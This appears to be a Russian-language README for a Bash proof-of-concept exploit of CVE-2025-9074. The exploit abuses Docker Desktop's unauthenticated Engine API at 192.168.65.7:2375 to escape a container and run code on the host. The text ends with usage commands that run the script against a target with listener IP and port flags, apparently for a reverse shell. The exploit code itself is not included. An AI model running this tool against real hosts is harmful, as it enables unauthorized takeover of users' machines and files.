
PoC-эксплойт на основе Bash для CVE-2025-9074, нацеленный на неаутентифицированный API Docker Engine, для выхода из контейнера и удаленного выполнения кода через привилегированное монтирование томов.
Критическая уязвимость CVE-2025-9074 в Docker Desktop позволяет локально запущенным контейнерам Linux подключаться к API Docker Engine через подсеть по умолчанию (192.168.65.7:2375). Проблема сохраняется независимо от настроек Enhanced Container Isolation (ECI) или TCP. Эксплойт PoC для CVE-2025-9074 общедоступен. Уязвимость может позволить несанкционированный доступ к файлам пользователя на хост-системе. Поэтому уровень риска оценивается как высокий.
Автономный Bash-скрипт для эксплуатации открытых API Docker (обычно порт 2375) без аутентификации. Этот инструмент автоматизирует выход из контейнера через монтирование томов, что позволяет выполнять удаленный код.
curl и grep. Не требуются внешние двоичные файлы или сторонние инструменты.chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>
